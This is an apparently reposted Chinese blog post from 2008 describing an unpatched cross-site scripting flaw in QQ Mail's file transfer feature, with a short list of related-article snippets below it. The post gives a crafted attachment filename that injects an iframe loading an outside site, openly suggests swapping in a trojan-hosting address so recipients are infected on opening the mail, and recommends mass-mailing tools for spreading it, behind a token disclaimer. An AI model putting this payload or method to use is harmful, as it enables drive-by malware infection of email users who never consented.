QQ邮箱跨站漏洞0day

最新推荐文章于 2024-06-03 17:51:00 发布
最新推荐文章于 2024-06-03 17:51:00 发布
阅读量145 收藏 1
点赞数
原文链接:http://www.cnblogs.com/allyesno/archive/2008/09/12/1289689.html
版权
09月10日QQ邮箱跨站漏洞
QQ邮箱跨站 漏洞就是针对文件中转站
首先,打开我的QQ邮箱,用我自己的做测试...

74_2_2db56ddfca265c3.jpg
如图一所示,打开我的QQ邮箱后,找到这个 文件中转站(1) 

74_2_5a192c0ad839192.jpg
如图二所示,
点...开始上传,,,,

这个地方写..

这是我们今天要利用的代码;
利用代码:【构造附件】
F:\pigerzhu<iframe src=http:// http://www.hxhack.com%20width=800%20height=800/><%2Fiframe>XXS.rar

以上利用代码中的网址 http://www.hxhack.com/可以换成你想要的网址,也可以替换成网马地址,这样对方一打开邮件,就会自动打开网马地址。
要是这个里面打开的网址被挂马?对方中马了都不知道吧。

其中的网址可以让你自由发挥,万一把里面的网址换成你的网马地址,再发给别人点击,对方就叫中马了。

74_2_741189a94cbf329.jpg
如图三所示:
下面 怎么办呢?

可以利用群发工具,,进行传播..我就不演示了,,我给自己发一份,,大家看下效果就可以了.

74_2_d84aa13fa86e3c6.jpg
好,我们到收件箱看下..
呵呵,大家可以看到,我们的 网站已经弹出来了...是的,就是这样...

74_2_94d17615b3d9536.jpg

大家千万不要利用来恶意搞破坏,发出来只是让大家更好的防护,而不是去搞破坏。

截止此文章发布的时候,漏洞依然存在,腾讯还没有补上这个漏洞。

转载于:https://www.cnblogs.com/allyesno/archive/2008/09/12/1289689.html

weixin_30295091
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BlueCMS-0day代码审计
孤桜懶契
04-17 682
代码审计的思路 代码审计核心在于通过源代码,知道代码如何执行,然后根据代码执行中可能产生的问题来寻找漏洞。 代码审计一般泛指白盒审计,但是要记住,通用性漏洞,例如CMS通杀漏洞,其实并不是仅仅只有代码审计能好到,本地搭建然后纯黑盒测试也可以的。只不过代码审计更为全面的容易找到漏洞 代码审计其实思路很简单,一共两条路线,全文通读和敏感函数定位。 全文通读:我看了每一行代码不是还不够清楚吗? 敏感函数定位:掌握住可以存在危险函数的地方 反推 渗透测试人员 -> 渗透测试 -> 找漏洞 -&
[红日安全]Web安全Day6 - 业务逻辑漏洞实战攻防
hongrisec的博客
02-29 869
本文由红日安全成员: Orion 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python...
对国内主流邮箱的跨站测试
weixin_30788239的博客
06-09 227
一、起因其实小雕以前发现过QQ邮箱跨站问题,不过那个是只能跨群邮件,跨不了普通个人邮件的。于是小雕继续研究,终于有了突破性进展!这一次跨得貌似厉害了点,嘿嘿。126、21cn、sina、tom、sohu、163、QQ这些大学常用的邮箱都存在跨站问题!经测试已经全部成功了,嘿嘿。不过 yahoo、hotmail这几个没有跨出来,鉴于技术和时间都有限,就说说已发现并测试成功的这些吧。貌似也是具有"中...
Coremail-0day敏感文件泄露漏洞送附批量检测脚本
热门推荐
god_Zeo的安全博客
06-17 1万+
漏洞介绍 Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终...
2022年8月29日 勒索病毒大爆发:0day漏洞 用友T+ 组件漏洞 中毒.LOCKED 病毒分析
石宗昊的博客
08-30 2551
用友T+月初的0day漏洞目前被黑客组织利用,全国大范围T+用户被勒索病毒加密,勒索赎金近3万元人民币,需使用比特币支付, 无论是本地服务器或云服务器都存在被攻击风险。相比较来说云服务器更容易被攻击,各类杀毒软件均对该病毒束手无策。黑客可能通过供应链污染或漏洞的方式进行投毒,因为后台分析显示,被加密攻击的磁盘文件与用友畅捷通T+软件模块升级时间相近。畅捷通,用友旗下成员企业,主营小微企业财税软件及云服务。我去搜索了一下,关于Fake病毒的相关介绍。火绒称此病毒为FakeTplus病毒。......
腾讯企业邮箱单点登录 php,腾讯企业邮箱集成的坑
weixin_42400669的博客
03-10 1796
腾讯企业邮箱官方api文档很简略还有一些错误和漏洞:1. 获取token单点登录和获取未读邮件数使用的secret不一致。此处很容易误解为最初用于获取AccessToken的corpSecret2.获取未读邮件数这个功能可以被管理员停用,需要开启停用的时候返回返回{"errcode":602005,"errmsg":"noprivilegetoaccessapp"}3.获取未读邮件数的请...
信息泄漏漏洞/Web安全Day12 - 敏感信息泄露实战攻防_0基础信息安全记录贴
程序员六七的博客
06-03 389
前端的源码(html,css,js)里面包含了敏感信息,比如后台登录地址、内网接口信息、甚至账号密码等; 敏感信息泄露虽然一直被评为危害比较低的漏洞
SRC漏洞挖掘经验
qq_59468567的博客
05-03 806
挖 SRC 需要有一个好心态,国内 SRC 生态并不是很好,SRC 感觉更多的提供了一个相对安全的测试保障,所以更需要抱着一种学习的心态去挖,将我们学习的到的知识灵活运用,发现新的问题。不要想我今晚一定要挖到多少漏洞,要拿到多少奖金,不然可能会被忽略三连打崩心态。转自: https://xz.aliyun.com/t/8501。
SRC混子的漏洞挖掘之道
weixin_41489908的博客
12-28 3620
一个SRC混子挖SRC的半年经验分享~,基本都是文字阐述,希望能给同样在挖洞的师傅们带来一点新收获。 前期信息收集 还是那句老话,渗透测试的本质是信息收集,对于没有0day的弱鸡选手来说,挖SRC感觉更像是对企业的资产梳理,我们往往需要花很长的时间去做信息收集,收集与此公司相关的信息,包括企业的分公司,全资子公司,网站域名、手机app,微信小程序,企业专利品牌信息,企业邮箱,电话等等,对于很多万人挖的src来说,你收集到了别人没有收集过的资产,往往离挖到漏洞就不远了。 企业相关信息收集 企查查
QQ邮箱发送验证码API+HTML源码
08-10
有些接口可以对接,但不能自定义发送QQ邮箱,只能使用其他邮箱;有些则无法自定义发送内容或标题,让我感到很头疼。而开发文档更加令人失望,几乎找不到完整的文档,而且还伴随着讨厌的广告。 于是我决定自己编写...
QQ邮箱批量检测是否开通工具V1.8.3.5.zip
08-30
这款工具的核心功能在于批量处理和自动化检测,其工作原理是通过发送特定的验证请求到腾讯的服务器,查询指定QQ邮箱账号的状态。如果服务器返回邮箱已开通的确认信息,那么该邮箱就被认为是有效的。这种检测方法基于...
腾讯快捷登录协议截取QQ邮箱ClientKey教程演示工具
08-07
最近发现之前的老代码已经不能获取QQ邮箱的Clientkey,经过一番调试后发现QQ邮箱更新了获取的流程,所以决定重新发布一篇文章,废话不多,直接上教程,喜欢的朋友记得点赞加关注。 本文地址: ...
腾讯再爆跨站漏洞QQ邮箱自助服务)
07-13
【标题】:“腾讯再爆跨站漏洞QQ邮箱自助服务)” 这个标题揭示了一个重要的网络安全事件,涉及到腾讯公司的QQ邮箱自助服务平台。"跨站漏洞"(Cross-Site Scripting,简称XSS)是一种常见的网络安全问题,它允许...
QQmail.rar_模仿qq邮箱
09-23
这个项目可能是为了教学或个人学习目的而创建的,旨在帮助开发者了解如何构建一个类似QQ邮箱的Web应用。通过研究这个项目,我们可以深入理解PHP在构建邮件系统中的应用以及前端界面设计的基本原理。 首先,QQ邮箱是...
大学生创业计划书(30)-两份资料.doc
08-20
大学生创业计划书(30)-两份资料.doc
学习DXP编辑多个对像
08-20
DXP编辑多个对像
基于Matlab编程的直线检测实现[Matlab编程].zip
最新发布
08-20
MATLAB提供了多种直线检测技术,其中包括以下几种常用的方法: 1. Hough变换:Hough变换是一种基于极坐标空间的直线检测方法,通过将直线表示为参数空间中的点,将图像中的直线检测问题转化为参数空间中的点集聚类问题。MATLAB中的函数'hough'和'houghlines'可以实现Hough变换直线检测。 2. 边缘检测+RANSAC:先使用边缘检测方法(如Sobel、Canny等)提取图像中的边缘,然后使用RANSAC算法拟合直线模型。MATLAB中的函数'edge'可以进行边缘检测,而函数'fitline'可以使用RANSAC算法进行直线拟合。 3. 直线分段检测:将图像中的直线分段,在每个段上进行直线拟合。常见的方法包括分段最小二乘法、分段Hough变换等。MATLAB中的函数'fitline'可以对图像中的曲线进行分段直线拟合。 4. 基于模型的直线检测:根据直线的几何模型进行直线检测,常见的方法包括RANSAC算法、最小二乘法等。MATLAB中的函数'fitline'可以实现基于模型的直线检测。 以上是一些常用的MATLAB直线检测技术,具体的选择要根据实
网络防火墙:数字世界的守卫者
08-20
【计算机网络开发】通常指的是开发计算机网络相关的软件和系统,包括但不限于以下几个方面: 1. **网络协议开发**:设计和实现用于网络通信的协议,如TCP/IP、HTTP、FTP等。 2. **网络应用开发**:开发运行在网络上的应用程序,如网页浏览器、电子邮件客户端、文件共享应用等。 3. **网络服务开发**:创建和管理网络服务,例如Web服务、数据库服务、云服务等。 4. **网络安全**:开发用于保护网络安全的软件,包括防火墙、入侵检测系统、加密技术等。 5. **网络设备驱动程序开发**:为网络硬件设备编写驱动程序,如网卡、路由器、交换机等。 6. **网络管理工具**:开发用于网络监控、管理和故障排除的工具。 7. **嵌入式网络系统**:开发用于嵌入式设备(如智能家居设备、工业控制系统)的网络功能。 8. **网络编程语言和框架**:使用特定的编程语言和框架(如Python、Java、Node.js等)进行网络应用的开发。 9. **分布式系统开发**:设计和实现分布式计算系统,这些系统可以跨多个物理位置运行。 10. **网络性能优化**:优化网络应用和系统的性能,确保
QQ邮箱:从困境到辉煌的成长之路
"腾讯大讲堂03-QQ邮箱成长历程.ppt" 本文将深入探讨QQ邮箱的发展历程,从其初期的困境到逐步崛起,再到最终成为国内领先的服务。QQ邮箱自2005年开始,经历了多次重大版本迭代,从最初的5M容量和基本功能,到后来的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值